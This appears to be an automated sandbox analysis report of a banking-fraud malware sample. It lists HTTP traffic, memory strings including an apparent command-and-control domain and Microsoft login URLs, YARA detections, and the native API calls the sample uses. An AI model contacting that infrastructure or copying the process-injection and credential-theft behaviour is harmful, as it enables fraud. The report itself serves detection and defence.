    Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 04:22:56 GMT
    Content-Type: text/html
    Content-Length: 148
    Connection: close
    ETag: "66a5f968-94"
    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 04:22:59 GMT
    Content-Type: text/html
    Content-Length: 148
    Connection: close
    ETag: "66a5f968-94"
    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 04:23:02 GMT
    Content-Type: text/html
    Content-Length: 148
    Connection: close
    ETag: "66a5f968-94"
    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Server: nginx
    Date: Sat, 11 Jan 2025 04:23:04 GMT
    Content-Type: text/html
    Content-Length: 148
    Connection: close
    ETag: "66a5f968-94"
    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: C6Abn5cBei.exe, 00000000.00000002.1504108330.0000000002621000.00000004.00000800.00020000.00000000.sdmp, zdDlscHlw.exe, 0000000A.00000002.1800123427.00000000031E7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mDeEygzSIDmBTP.exe, 00000014.00000002.2690431464.0000000004B64000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.hm35s.top
Source: mDeEygzSIDmBTP.exe, 00000014.00000002.2690431464.0000000004B64000.00000040.80000000.00040000.00000000.sdmp, String found in binary or memory: http://www.hm35s.top/ebw6/
Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: regini.exe, 00000011.00000002.2686703437.00000000033AF000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: regini.exe, 00000011.00000003.2064033264.00000000082D3000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
                Source: regini.exe, 00000011.00000002.2686703437.00000000033AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033u7#G
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: regini.exe, 00000011.00000002.2686703437.00000000033C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: regini.exe, 00000011.00000002.2686703437.00000000033AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: regini.exe, 00000011.00000003.2076366512.00000000083A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.C6Abn5cBei.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000011.00000002.2686152475.0000000002FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688254517.00000000035A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876826679.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.2690431464.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.1876572598.00000000014F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2688146046.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0042C843 NtClose,9_2_0042C843
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2B60 NtClose,LdrInitializeThunk,9_2_011C2B60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_011C2DF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_011C2C70
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C35C0 NtCreateMutant,LdrInitializeThunk,9_2_011C35C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C4340 NtSetContextThread,9_2_011C4340
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C4650 NtSuspendThread,9_2_011C4650
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2B80 NtQueryInformationFile,9_2_011C2B80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2BA0 NtEnumerateValueKey,9_2_011C2BA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2BF0 NtAllocateVirtualMemory,9_2_011C2BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2BE0 NtQueryValueKey,9_2_011C2BE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2AB0 NtWaitForSingleObject,9_2_011C2AB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2AD0 NtReadFile,9_2_011C2AD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2AF0 NtWriteFile,9_2_011C2AF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2D10 NtMapViewOfSection,9_2_011C2D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2D00 NtSetInformationFile,9_2_011C2D00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2D30 NtUnmapViewOfSection,9_2_011C2D30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2DB0 NtEnumerateKey,9_2_011C2DB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2DD0 NtDelayExecution,9_2_011C2DD0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2C00 NtQueryInformationProcess,9_2_011C2C00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2C60 NtCreateKey,9_2_011C2C60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2CA0 NtQueryInformationToken,9_2_011C2CA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2CC0 NtQueryVirtualMemory,9_2_011C2CC0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2CF0 NtOpenProcess,9_2_011C2CF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2F30 NtCreateSection,9_2_011C2F30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2F60 NtCreateProcessEx,9_2_011C2F60
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2F90 NtProtectVirtualMemory,9_2_011C2F90
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2FB0 NtResumeThread,9_2_011C2FB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2FA0 NtQuerySection,9_2_011C2FA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2FE0 NtCreateFile,9_2_011C2FE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2E30 NtWriteVirtualMemory,9_2_011C2E30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2E80 NtReadVirtualMemory,9_2_011C2E80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2EA0 NtAdjustPrivilegesToken,9_2_011C2EA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C2EE0 NtQueueApcThread,9_2_011C2EE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3010 NtOpenDirectoryObject,9_2_011C3010
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3090 NtSetValueKey,9_2_011C3090
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C39B0 NtGetContextThread,9_2_011C39B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3D10 NtOpenProcessToken,9_2_011C3D10
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C3D70 NtOpenThread,9_2_011C3D70
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_0243D3A40_2_0243D3A4
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A4A6000_2_06A4A600
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A492B00_2_06A492B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A48E780_2_06A48E78
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A4AFA00_2_06A4AFA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A4AFB00_2_06A4AFB0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_06A48A400_2_06A48A40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 0_2_0A090C000_2_0A090C00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004186B39_2_004186B3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040281F9_2_0040281F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004028209_2_00402820
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040E0D39_2_0040E0D3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004100E39_2_004100E3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004168A39_2_004168A3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004031509_2_00403150
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040E2179_2_0040E217
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040E2239_2_0040E223
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_004024E09_2_004024E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040FEC39_2_0040FEC3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0042EEA39_2_0042EEA3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0040FEBA9_2_0040FEBA
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011801009_2_01180100
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122A1189_2_0122A118
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012181589_2_01218158
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012501AA9_2_012501AA
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012481CC9_2_012481CC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012220009_2_01222000
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124A3529_2_0124A352
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012503E69_2_012503E6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119E3F09_2_0119E3F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012302749_2_01230274
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012102C09_2_012102C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011905359_2_01190535
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012505919_2_01250591
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012344209_2_01234420
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012424469_2_01242446
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123E4F69_2_0123E4F6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B47509_2_011B4750
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011907709_2_01190770
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118C7C09_2_0118C7C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AC6E09_2_011AC6E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A69629_2_011A6962
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0125A9A69_2_0125A9A6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011929A09_2_011929A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119A8409_2_0119A840
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011928409_2_01192840
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011768B89_2_011768B8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011BE8F09_2_011BE8F0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124AB409_2_0124AB40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01246BD79_2_01246BD7
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118EA809_2_0118EA80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119AD009_2_0119AD00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122CD1F9_2_0122CD1F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A8DBF9_2_011A8DBF
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0118ADE09_2_0118ADE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190C009_2_01190C00
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01230CB59_2_01230CB5
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01180CF29_2_01180CF2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01232F309_2_01232F30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011B0F309_2_011B0F30
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D2F289_2_011D2F28
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01204F409_2_01204F40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0120EFA09_2_0120EFA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01182FC89_2_01182FC8
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119CFE09_2_0119CFE0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124EE269_2_0124EE26
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01190E599_2_01190E59
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011A2E909_2_011A2E90
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124CE939_2_0124CE93
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124EEDB9_2_0124EEDB
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0125B16B9_2_0125B16B
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117F1729_2_0117F172
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011C516C9_2_011C516C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0119B1B09_2_0119B1B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124F0E09_2_0124F0E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012470E99_2_012470E9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011970C09_2_011970C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123F0CC9_2_0123F0CC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124132D9_2_0124132D
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0117D34C9_2_0117D34C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D739A9_2_011D739A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011952A09_2_011952A0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012312ED9_2_012312ED
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AB2C09_2_011AB2C0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012475719_2_01247571
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122D5B09_2_0122D5B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124F43F9_2_0124F43F
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011814609_2_01181460
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124F7B09_2_0124F7B0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012416CC9_2_012416CC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_012259109_2_01225910
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011999509_2_01199950
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AB9509_2_011AB950
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011FD8009_2_011FD800
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011938E09_2_011938E0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FB769_2_0124FB76
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AFB809_2_011AFB80
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01205BF09_2_01205BF0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011CDBF99_2_011CDBF9
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01203A6C9_2_01203A6C
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01247A469_2_01247A46
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FA499_2_0124FA49
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01231AA39_2_01231AA3
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0122DAAC9_2_0122DAAC
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011D5AA09_2_011D5AA0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0123DAC69_2_0123DAC6
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01247D739_2_01247D73
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01193D409_2_01193D40
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01241D5A9_2_01241D5A
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_011AFDC09_2_011AFDC0
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01209C329_2_01209C32
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FCF29_2_0124FCF2
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FF099_2_0124FF09
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01191F929_2_01191F92
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_0124FFB19_2_0124FFB1
                Source: C:\Users\user\Desktop\C6Abn5cBei.exeCode function: 9_2_01199EB09_2_01199EB0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 10_2_0176D3A410_2_0176D3A4
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141010015_2_01410100
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0146600015_2_01466000
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014A02C015_2_014A02C0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142053515_2_01420535
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0144475015_2_01444750
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142077015_2_01420770
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141C7C015_2_0141C7C0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143C6E015_2_0143C6E0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0143696215_2_01436962
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014229A015_2_014229A0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142A84015_2_0142A840
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142284015_2_01422840
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0144E8F015_2_0144E8F0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0145889015_2_01458890
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_014068B815_2_014068B8
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141EA8015_2_0141EA80
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142ED7A15_2_0142ED7A
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0142AD0015_2_0142AD00
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01428DC015_2_01428DC0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_0141ADE015_2_0141ADE0
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01438DBF15_2_01438DBF
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01420C0015_2_01420C00
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01410CF215_2_01410CF2
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01494F4015_2_01494F40
                Source: C:\Users\user\AppData\Roaming\zdDlscHlw.exeCode function: 15_2_01462F2815_2_01462F28
